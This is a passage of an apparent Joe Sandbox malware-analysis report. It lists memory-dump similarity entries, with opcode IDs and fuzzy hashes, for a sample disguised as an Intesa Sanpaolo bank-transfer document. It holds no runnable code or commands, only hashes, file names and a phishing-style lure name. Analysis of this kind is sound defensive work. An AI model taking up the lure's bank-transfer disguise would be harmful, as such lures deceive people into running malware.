                                  • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                  • Instruction ID: d629e23cc64e27d53bdac26cd6e51290cb729a69df65a258fd9e02f6a5c3d851
                                  • Opcode Fuzzy Hash: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                  • Instruction Fuzzy Hash: 3F818071A0061A9BDB18CF69C890ABEFBF9FB48700F04853EE445E7644E775D940CBA4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction ID: 10d9f50a63a619b633fcce28ac6d58aea7ce1fc74b35558e9f9a55ab4477cf62
                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction Fuzzy Hash: F6817E71A002099FDF1DDF98D890AAEBBB6BF84310F19C56AD9169B384D774E902CF50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                  • Instruction ID: 8e472d2edff610e9261b3a0be93d46b891ab863e7e752f2ae1707e64d5e35fcd
                                  • Opcode Fuzzy Hash: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                  • Instruction Fuzzy Hash: EE71B371A0470A9BEB2DCF19C8A0B6EF7E4BB44358F054939E9A5C7204E730E944CB92
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                  • Instruction ID: be3bb92d476ea1ba8dd9d629d226af213469963ef3a84409e62ac27f12053f3b
                                  • Opcode Fuzzy Hash: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                  • Instruction Fuzzy Hash: 47818F71A00609AFDB25CFA9C884BEEBBF9FF88314F11842DE695A7650D770AC45CB50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                  • Instruction ID: eb23cb548d03bddac4250aeabb6f82c57025d8e897a2b3edae7cef36ed805bc1
                                  • Opcode Fuzzy Hash: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                  • Instruction Fuzzy Hash: AA71DA75C002299FDB298F58D9907BEBBF0FF58710F15412AE992AB350E7309854CBA0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                  • Instruction ID: 5bcc1ecea56bf4c49b668ca9913abaa13b67b58e98aed63a2a06c9161b866124
                                  • Opcode Fuzzy Hash: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                  • Instruction Fuzzy Hash: 9071BF70904266DFCB59DF5AC840ABABBF1EF89304F048069EDA4DB241E335EA45C7A1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: e69c4ed0a3f04f38747073b7aafdfb0a118f32ed7eb82d382954aa9aabc8ae11
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: 48717D71E0060AAFDB14DFA9C984EDEBBB8FF48704F104569E645AB250DB30EA41CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                  • Instruction ID: ffaf9ce4a43dcd9eb0b81667a84ed99c9d95a02baed6557fecd04ef0a6e381c0
                                  • Opcode Fuzzy Hash: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                  • Instruction Fuzzy Hash: FB71F232200B01EFE77A9F18C844F5ABBB6EF44724F554528EA658B2E1D774E944CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                  • Instruction ID: 03d756881e53b8a67aff7243f01952d4ed611a7fa9e24e165c4729ed0c9bf159
                                  • Opcode Fuzzy Hash: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                  • Instruction Fuzzy Hash: FE81BD72A083268FDB28CF9CC4C4BAEB7B1BB49710F15812ED901AB282C7759D50CF94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                  • Instruction ID: 6ecce2a88fd3306672e8de36dbe70a96f44d2138d829c4186640a036998a085b
                                  • Opcode Fuzzy Hash: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                  • Instruction Fuzzy Hash: 1361C071A0020ADFDB1DDF68C982AAEB7B5FF48314F14466DE652EB295DB309902CF50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                  • Instruction ID: 1c454bb3357d623e9c8a4b1a1066e2c29a9f1014cad3047f5a75fa0a310933e8
                                  • Opcode Fuzzy Hash: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                  • Instruction Fuzzy Hash: 7651CD7120075ADFDB25DB5AC888B6BB7F9BF54709F10092DE18287A52D774E885CB80
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                  • Instruction ID: 08c3e8f9f8634b75046041a6206d5e48504b98457e6477717728a815c91adc0f
                                  • Opcode Fuzzy Hash: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                  • Instruction Fuzzy Hash: 2651D1726047129FD72AEF28C840BAAB7E5FF94354F44892CF98597290D734E908CF96
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88379f8c6bd6dd1ef2e7a498fb9a2f1f20dd9b07d3e6a651ba80acfc737be858
                                  • Instruction ID: 988c4e07fb7945aab7cc9a67e08d1e8b855f072086a31618747dcd319ff2e494
                                  • Opcode Fuzzy Hash: 88379f8c6bd6dd1ef2e7a498fb9a2f1f20dd9b07d3e6a651ba80acfc737be858
                                  • Instruction Fuzzy Hash: 4C51BD709007059BD729DF5AC884BABFBFCBF54714F10461EE292976A0C7B1A945CB50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                  • Instruction ID: 142e75514e6e78a016225a19864309741188269e3f8a75fcb970c75fd6bc81ed
                                  • Opcode Fuzzy Hash: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                  • Instruction Fuzzy Hash: A15188716083528FD758DF29C880A6BBBE9FFC8208F444A2DF589C7650EB31D915CB92
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction ID: 05311d9b674ba080ef332b102f7794d1443fb61fe96cc8f3fe5d47af1a5fe1b1
                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction Fuzzy Hash: 38519B75E0021AAFDB15DF99C844BEEBBF5BF49354F04406AEA81EB240D734D944CBA4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction ID: 5f05f45d041e6084ac5ec149666cd299b14aa94b7d6f011a1cebf5e0a58d5d3f
                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction Fuzzy Hash: 1F51F931D0120AEFEF29DF94C884FAEBB74BF00B68F154665D91267290D7789E40CBA1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                  • Instruction ID: 429de37e9c51367d77e23d7e1602417aedc19a85a8c7c2b4ed5d7ecf9a30142e
                                  • Opcode Fuzzy Hash: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                  • Instruction Fuzzy Hash: 9141C3707056119BE72DFB2DC994BBBBB9AEFD0260F44C219F95587284DB34D801CE91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                  • Instruction ID: 5d097999a57bb0ec832fee66cea6d749d22e2f30ee69f6e72e68bdb60a80dbd6
                                  • Opcode Fuzzy Hash: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                  • Instruction Fuzzy Hash: 1131EDB5506341CFCB19DF19C5809AABBF9FF89614F444AAEE4889B305D332D961CB82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                  • Instruction ID: d12afa390cb433db154ab123a81b2cd83961903f1c37b814c6eaee3c5423c4d4
                                  • Opcode Fuzzy Hash: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                  • Instruction Fuzzy Hash: 7B31D671B003059FD728EFBAC985A6E77F9AB94304F008529D586D7254DB30EA41CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction ID: 7717847a144bd21ec54219fe3453de25713e94cb343927eac7963c4ede0bfd29
                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction Fuzzy Hash: 0F210672E1525AAADB159BB98851BEFFBB5AF14740F058035DE55EB340E370D90087A0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                  • Instruction ID: 8de8f3e8ac183e750ad337020f1662223ff0105d859e4aff6ea238c33412b9c7
                                  • Opcode Fuzzy Hash: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                  • Instruction Fuzzy Hash: F7315BB15003018BDF29AF68DC85BA9B7B4AF50308F4486B9DD859B346EB34D981CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction ID: c2ac4f6f6583e1b2f5906a39cc99fb821f59077c983d4f0dcce3c219897ccaf6
                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction Fuzzy Hash: FB21FB36A00657A6CB19AF95C800FFBBBB5EF90714F40841AFA968B791E734D950C7E0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                  • Instruction ID: 786a6434da520eb743ee60fd84cb29bc53240ccac7eb2219906b8579242301d4
                                  • Opcode Fuzzy Hash: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                  • Instruction Fuzzy Hash: 0C31D731A0152C9BDB35DF18CC81FEE77B9EB15740F0101E5E685AB290DBB49E808FA1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction ID: 5ed17e5a34a9104b537f0b5c6b27f2edfc346864b8a2ee47b89103cb4a181b30
                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction Fuzzy Hash: 25219F32A00609EBCB15CF58C981A8FBBF5FF4C714F148069EE59DB641D671EA058B90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                  • Instruction ID: 65a9288ee06b520cd82baea4bbed47fd7336ebcaecef6f57db13e654d6fb0eee
                                  • Opcode Fuzzy Hash: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                  • Instruction Fuzzy Hash: CB21B1726047499BC722DF58C885B6BB7E4FF88B60F05451DFE949BA42D730E9008BA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction ID: c4134f81ff37fa63eb77521cfda286cecd056bacbad9b920bdf628c39672363a
                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction Fuzzy Hash: 5231AB31600605EFDB25DF68C888FAAB7F9FF45354F1045A9E5928B281E730EE02CB51
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                  • Instruction ID: 6a5bd998a699d74a4d9625cce87086a8f57b9e610d7f6408371f52bc6df3d463
                                  • Opcode Fuzzy Hash: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                  • Instruction Fuzzy Hash: E8317AB5A112069FCB1CCF18C8849AEB7B6EFD4304F154459E80A9B395E771EA50CB91
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                  • Instruction ID: bae4649b7e796f1a070c437291e59891f31655b079933403b3ef1c4500edd709
                                  • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                  • Instruction Fuzzy Hash: 082133317006D19BE72EA72CD814B6E7BF4AF40B50F0940A5EE828B6D2E7789C10CA15
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                  • Instruction ID: 6357023d69b9465d2226bef9cdbd69c90548d5e0a129599e095d3ece1061c615
                                  • Opcode Fuzzy Hash: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                  • Instruction Fuzzy Hash: FA21B1719006299BCF19DF59C881AFEB7F4FF48744F400069FA81AB240D778AD41CBA1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                  • Instruction ID: 43e72a14987dbe21c9ab4bca86946e3742fea3953bfb89ab23dfa17ad3d19a61
                                  • Opcode Fuzzy Hash: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                  • Instruction Fuzzy Hash: A4218D71A00645AFD719DB69D840FAAB7A8FF48740F140069FA44DB690D734ED40CB58
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                  • Instruction ID: 22b7755439e8bee3f4543962b19a9ef49ba949650b79d8fb265d4f0b307e4514
                                  • Opcode Fuzzy Hash: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                  • Instruction Fuzzy Hash: 0E21B3B29083469FD715EF5AD844FDBBBDCAF94A44F08045ABE80CB291D734D904C7A2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                  • Instruction ID: d6a64d50d646dd259c3c5ff0214d8092b9d4adf31cf7c53bbdee7fa136a872b5
                                  • Opcode Fuzzy Hash: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                  • Instruction Fuzzy Hash: 92213E316457969FE326672DDD08B593BD8EF41B74F2803A0FAA09F6D2D768C8018645
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                  • Instruction ID: 0c6857260ab4de3d26283863c0b490db24973260ad516e17c248a0bbbcac711a
                                  • Opcode Fuzzy Hash: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                  • Instruction Fuzzy Hash: F0219A75200B01EBCB29DF29CD41B8677F5EF48B44F14846CA549CBB61E331E942CB94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                  • Instruction ID: 9936a17f7438482dd4e4c623f04d6f7604fe21bdfcc7801aa17b71fdcb44b2aa
